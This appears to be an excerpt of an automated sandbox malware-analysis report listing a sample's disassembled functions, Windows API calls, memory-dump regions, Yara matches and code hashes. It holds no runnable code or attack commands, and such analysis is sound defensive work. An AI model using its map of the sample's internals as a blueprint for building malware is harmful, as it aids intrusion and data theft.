                                                      • String ID: string too long
                                                      • API String ID: 2304785028-2556327735
                                                      • Opcode ID: 1ec711253458015476fa0fdf246fcdf1831fe10d1430631244de81fbdc863098
                                                      • Instruction ID: e75b845ac4a54d531e9520b8b17775a39ee458b7094510186484d20565971360
                                                      • Opcode Fuzzy Hash: 1ec711253458015476fa0fdf246fcdf1831fe10d1430631244de81fbdc863098
                                                      • Instruction Fuzzy Hash: 0721AE213106508BDB259A6C8E80A2AB3E6AB85701B74093FE4D1D77C6DF79AC40879D
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C78AEA
                                                        • Part of subcall function 02C9A5EA: std::exception::exception.LIBCMT ref: 02C9A5FF
                                                        • Part of subcall function 02C9A5EA: __CxxThrowException@8.LIBCMT ref: 02C9A614
                                                        • Part of subcall function 02C9A5EA: std::exception::exception.LIBCMT ref: 02C9A625
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                      • String ID: yxxx$yxxx
                                                      • API String ID: 1823113695-1021751087
                                                      • Opcode ID: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
                                                      • Instruction ID: 5d4fb20d87b8f837ec777535247128b6b3375afce8b45757936e6c1695536bf4
                                                      • Opcode Fuzzy Hash: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
                                                      • Instruction Fuzzy Hash: C23187B5E005199BCB08DF58C8906AEBBB6EBD8310F18C269E915EF384D734A901CBD1
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408A75
                                                        • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
                                                        • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
                                                      • memcpy.MSVCRT(?,?,?), ref: 00408ABF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                                      • String ID: string too long
                                                      • API String ID: 2475949303-2556327735
                                                      • Opcode ID: 1ea38f53a1986befa71b2f14c9c86753e2a733b722ecbf4c63771af5796a1cdd
                                                      • Instruction ID: 7161fd42a55e92d43a5e45998473509cc6e3c5444d18c1b7783adeed0e280c87
                                                      • Opcode Fuzzy Hash: 1ea38f53a1986befa71b2f14c9c86753e2a733b722ecbf4c63771af5796a1cdd
                                                      • Instruction Fuzzy Hash: A821D3317046045BEB20CE6DDA4066EB7A6EBD5320F148A3FE891937C1DF74A9448A98
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408B8F
                                                        • Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
                                                        • Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA
                                                      • memmove.MSVCRT(?,?,?,?,?,004089B2,00000000,?,?,004087D0,?,00000000,00407897), ref: 00408BC5
                                                      Strings
                                                      • invalid string position, xrefs: 00408B8A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                                      • String ID: invalid string position
                                                      • API String ID: 655285616-1799206989
                                                      • Opcode ID: f028ea1e87d6ef5ac08bc30147daee1a1170208e71a992f96d283b447fa1bbce
                                                      • Instruction ID: 251e689e54e62f48c7bad3d43e38cf1f7295a935bb062c6d590f7bc18ba98dac
                                                      • Opcode Fuzzy Hash: f028ea1e87d6ef5ac08bc30147daee1a1170208e71a992f96d283b447fa1bbce
                                                      • Instruction Fuzzy Hash: 3D0184703047018BD7258A2CEE9461AB7B6DBC5704B68093EE0D2D7B85DBB8FC42839C
                                                      APIs
                                                      • lstrlen.KERNEL32(?,00000000,?), ref: 02C74E86
                                                      • InternetCrackUrlA.WININET(?,00000000), ref: 02C74E8E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CrackInternetlstrlen
                                                      • String ID: <
                                                      • API String ID: 1274457161-4251816714
                                                      • Opcode ID: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                                                      • Instruction ID: 5b500854a877a1c397caa8f8373435d6f5f1224f8ad42c348f90db06245638c7
                                                      • Opcode Fuzzy Hash: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                                                      • Instruction Fuzzy Hash: C7012971D00218AFEB14DFA9EC45B9EBBB9EB48360F00812AF954E7390EB7459058FD0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitGlobalMemoryProcessStatus
                                                      • String ID: @
                                                      • API String ID: 803317263-2766056989
                                                      • Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction ID: 0104c7d3b133c38f143275394d13649da6cf77ff646445b5046ddd7f811f225e
                                                      • Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction Fuzzy Hash: 76F027701082848BEF146675C88972DF3D8DB42354F080A2DDD9EC2A90E3F0C400C67B
                                                      APIs
                                                      • std::exception::operator=.LIBCMT ref: 00427692
                                                        • Part of subcall function 00427612: std::exception::_Tidy.LIBCMT ref: 00427622
                                                        • Part of subcall function 00427612: std::exception::_Copy_str.LIBCMT ref: 00427632
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::exception::_$Copy_strTidystd::exception::operator=
                                                      • String ID: PVC$RvB
                                                      • API String ID: 2698302428-3672294337
                                                      • Opcode ID: 3bcccb99a86f891201583defc26f550b7ded3d8e37b933871c58baabc1632d31
                                                      • Instruction ID: bb51f0ba413812d8853d7eb6890f665a9bd2e51ac6c0f51ff85d0c39d38b05c4
                                                      • Opcode Fuzzy Hash: 3bcccb99a86f891201583defc26f550b7ded3d8e37b933871c58baabc1632d31
                                                      • Instruction Fuzzy Hash: 60D0A9322043246BC3201A8AE809B83FF88DB413B6F40882EE5C847300CBB9985087E8
                                                      APIs
                                                        • Part of subcall function 02C944B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 02C944E4
                                                        • Part of subcall function 02C944B7: lstrcpy.KERNEL32(00000000,?), ref: 02C94519
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C942DC
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 02C94306
                                                        • Part of subcall function 02C942A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02C715B5,?,0000001A), ref: 02C94310
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6A2
                                                      • lstrcat.KERNEL32(00000000), ref: 02C8C6AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6DA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C719
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: 24b5cf9d3328fae0c45e8d89246218dd751768110a068050fd15e1e67777ade2
                                                      • Instruction ID: d2aab05d0f96b64370cfc34a65d87c8a7f94f5ddf16d3b273a0bd73f32c734cf
                                                      • Opcode Fuzzy Hash: 24b5cf9d3328fae0c45e8d89246218dd751768110a068050fd15e1e67777ade2
                                                      • Instruction Fuzzy Hash: 5C318B70D0025ADBDF14EFA4CC88B9DB7B6AF94308F1480A6D805A7250DB749F85EFA1
                                                      APIs
                                                        • Part of subcall function 02C944B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 02C944E4
                                                        • Part of subcall function 02C944B7: lstrcpy.KERNEL32(00000000,?), ref: 02C94519
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C942DC
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 02C94306
                                                        • Part of subcall function 02C942A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02C715B5,?,0000001A), ref: 02C94310
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6A2
                                                      • lstrcat.KERNEL32(00000000), ref: 02C8C6AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6DA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C719
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: 6f5709e280dc5b66a845d9763e97af322c35ce3dbc48c25b30e692c72c51b1bb
                                                      • Instruction ID: 91f018f9deca8a1c05282628f5f5d5bf497a9411f2747f15ddf0f7a58f498b54
                                                      • Opcode Fuzzy Hash: 6f5709e280dc5b66a845d9763e97af322c35ce3dbc48c25b30e692c72c51b1bb
                                                      • Instruction Fuzzy Hash: 49317C71E002499BDF14EFA4CC88B9DB7B2EF80308F1580A6D805AB250DB749F45EFA1
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 00421771
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004217A9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004217E1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00421819
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 7e39542eb815251b26265a8778df00e4c3cd8d6bba4f32d2fc9bec7db7d7b59b
                                                      • Instruction ID: c18d6414a2412b528fc955e16ea083020aa3798d7b09f0809961d6aed774200b
                                                      • Opcode Fuzzy Hash: 7e39542eb815251b26265a8778df00e4c3cd8d6bba4f32d2fc9bec7db7d7b59b
                                                      • Instruction Fuzzy Hash: 63212A74701B028BD724DF3AE998A17B7F5AF94700B40492EE486D3B90DB78E801CFA4
                                                      APIs
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000), ref: 0040162D
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 0040164F
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 00401671
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,00420703), ref: 00401693
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401557
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401579
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: f6290d38e266f0673cc93ec969457b120af7ef1e1bcd1c1e7eedd9cdd132e45b
                                                      • Instruction ID: 80b5f1fa651da611af66416e481b020f72ab7f98df4cd08dbf14573642dabe07
                                                      • Opcode Fuzzy Hash: f6290d38e266f0673cc93ec969457b120af7ef1e1bcd1c1e7eedd9cdd132e45b
                                                      • Instruction Fuzzy Hash: 7931C674A01B02AFC724DF3AC988953B7E5BF48304704492EA896D7BA0DB74F811CF94
                                                      APIs
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000), ref: 02C71894
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000,?), ref: 02C718B6
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000,?), ref: 02C718D8
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000,?), ref: 02C718FA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
                                                      • Instruction ID: 205a64e1747e96bf0d1d08f3409b6b9585c35ec395b86f1516d2fdb9ffb83503
                                                      • Opcode Fuzzy Hash: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
                                                      • Instruction Fuzzy Hash: 4D3192B4A01B42AFD728DF3AD588956BBE9FF89709704492DA896C3B50DB70F410DF90
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C942DC
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 02C94306
                                                        • Part of subcall function 02C942A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02C715B5,?,0000001A), ref: 02C94310
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6A2
                                                      • lstrcat.KERNEL32(00000000), ref: 02C8C6AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6DA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C719
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$SystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 3486790982-0
                                                      • Opcode ID: 391cc230fe22c833b7d73818f8b18e323177aab1a4d2678ce48e4e0ca96b9384
                                                      • Instruction ID: b99be0b285b9220dd10db421a37ee33f7f966b71e3e0cf9a6b6178441c8fedd2
                                                      • Opcode Fuzzy Hash: 391cc230fe22c833b7d73818f8b18e323177aab1a4d2678ce48e4e0ca96b9384
                                                      • Instruction Fuzzy Hash: 63217C70D00246DBCB14EFB4CC88AAD7BB6EF84308F149466D401AB250DB749B44EFA1
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 00406F00
                                                      • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406F3C
                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 00406F74
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00406F7B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapmemcpy$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1643994569-0
                                                      • Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                      • Instruction ID: 3489786ad6ffc592b33c98b5093e94c05e4d8cefe55189094fd4c73ee0e5810c
                                                      • Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                      • Instruction Fuzzy Hash: 8B216D706106029BDB248B21DD84BBB73E8EB40704F44487DF946DBA84FBB9E956CB64
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 0040162D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040164F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401671
                                                      • lstrcpy.KERNEL32(00000000,00420703), ref: 00401693
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 28fd2b5c74b08a858c26432764930a6c7ed5af5e3d7337ed90fdeaffeb5ceb02
                                                      • Instruction ID: 77a9aadbbd26ea48150a62d0fa0b2c9b2127a70dadc2ffa25d6a6684b0360a2a
                                                      • Opcode Fuzzy Hash: 28fd2b5c74b08a858c26432764930a6c7ed5af5e3d7337ed90fdeaffeb5ceb02
                                                      • Instruction Fuzzy Hash: 291112B46117029BD7149F36D94C927B7F8BF44305704093EA496E3B90DB79E801CB94
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 02C71894
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C718B6
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C718D8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C718FA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
                                                      • Instruction ID: 9bfd9ade0d3caeff15c84833d4da706104922a33fcc114d61653c55b0e652f2d
                                                      • Opcode Fuzzy Hash: a850a7e5ed72b0bb27d1bfac9c252af4a5a53a90ad6aee72d6a55d070e261114
                                                      • Instruction Fuzzy Hash: 551133B4A117039BD7249F35D858926BBF9FF847053084A2DD89AD3B40EB70E501DFA0